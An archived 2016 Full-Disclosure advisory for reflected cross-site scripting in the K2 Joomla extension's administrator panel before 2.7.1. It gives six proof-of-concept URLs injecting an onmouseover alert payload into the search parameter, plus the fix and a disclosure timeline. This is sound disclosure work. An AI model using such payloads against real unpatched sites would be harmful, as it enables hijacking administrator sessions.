| lists.openwall.net | lists / announce owl-users owl-dev john-users john-dev passwdqc-users yescrypt popa3d-users / oss-security kernel-hardening musl sabotage tlsify passwords / crypt-dev xvendor / Bugtraq Full-Disclosure linux-kernel linux-netdev linux-ext4 linux-hardening linux-cve-announce PHC | |
|
Open Source and information security mailing list archives
| ||
|
Message-ID: <78ea48bd-2bf4-3f34-19c6-48c68cde4362@a2secure.com> Date: Thu, 4 Aug 2016 12:05:49 +0200 From: Manuel Mancera <mmancera@...ecure.com> To: fulldisclosure@...lists.org Subject: [FD] K2 (Joomla! Extension) < 2.7.1 - Reflected Cross Site Scripting ================================================================ K2 Joomla! Extension < 2.7.1 - Reflected Cross Site Scripting ================================================================ Information -------------------- Name: K2 Joomla! Extension - Reflected Cross Site Scripting Affected Software : K2 Affected Versions: < 2.7.1 Vendor Homepage : https://getk2.org/ http://extensions.joomla.org/extension/k2 Vulnerability Type : Reflected Cross Site Scripting Severity : Medium CVE: n/a Product -------------------- K2 is a Joomla! extension for content construction, so it allow edit the content of the Joomla administration panel and the website. Description -------------------- The administrator panel of K2 suffers multiple reflected cross site scripting. An attacker could trick to an administrator to click in a malicious URL and steal his cookie or redirect to a malicious site to generate new attack vectors (e.g. launch exploits against his browser). This XSS just affects to administrators so the range of attacks is limited but still is being a risk. Source code fixed: https://github.com/getk2/k2/commit/c78f929dd3fcd4c55ba614ef8e789b944c30dc8d Proof of Concept ------------------- PoC: http://localhost/administrator/index.php?option=com_k2&view=comments&search=" onmouseover="alert(document.domain)"/> PoC: http://localhost/administrator/index.php?option=com_k2&view=categories&search=" onmouseover="alert(document.domain)"/> PoC: http://localhost/administrator/index.php?option=com_k2&view=users&search=" onmouseover="alert(document.domain)"/> PoC: http://localhost/administrator/index.php?option=com_k2&view=extrafields&search=" onmouseover="alert(document.domain)"/> PoC: http://localhost/administrator/index.php?option=com_k2&view=items&search=" onmouseover="alert(document.domain)"/> PoC: http://localhost/administrator/index.php?option=com_k2&view=tags&search=" onmouseover="alert(document.domain)"/> Solution -------------------- Update to the latest release (2.7.1). More info: https://getk2.org/blog/2571-k2-v271-released https://vel.joomla.org/resolved/1858-k2-2-7-0-xss-cross-site-scripting Advisory Timeline -------------------- 26/07/2016 - Informed to the Vendor about the issue. 26/07/2016 - Vendor answers me and try to persuade about that the XSS is not a vulnerability. He said: "Just because you can run a piece of JS somewhere doesn't mean it's a security issue." WTF 28/07/2016 - Informed to Joomla VEL about the issue. 29/07/2016 - Joomla VEL confirmed and wrote me that the vendor will fix it. 29/07/2016 - Vendor confirms me the vulnerability. LOL 04/08/2016 - Vendor fixed in the latest release. 04/08/2016 - Public disclosure. Definitely, sometimes a full disclosure is better than a responsible disclosure. Credits & Authors -------------------- Manuel Mancera (@sinkmanu) Disclaimer ------------------- All information is provided without warranty. The intent is to provide information to secure infrastructure and/or systems, not to be able to attack or damage. Therefore A2Secure shall not be liable for any director indirect damages that might be caused by using this information. _______________________________________________ Sent through the Full Disclosure mailing list https://nmap.org/mailman/listinfo/fulldisclosure Web Archives & RSS: http://seclists.org/fulldisclosure/
Powered by blists - more mailing lists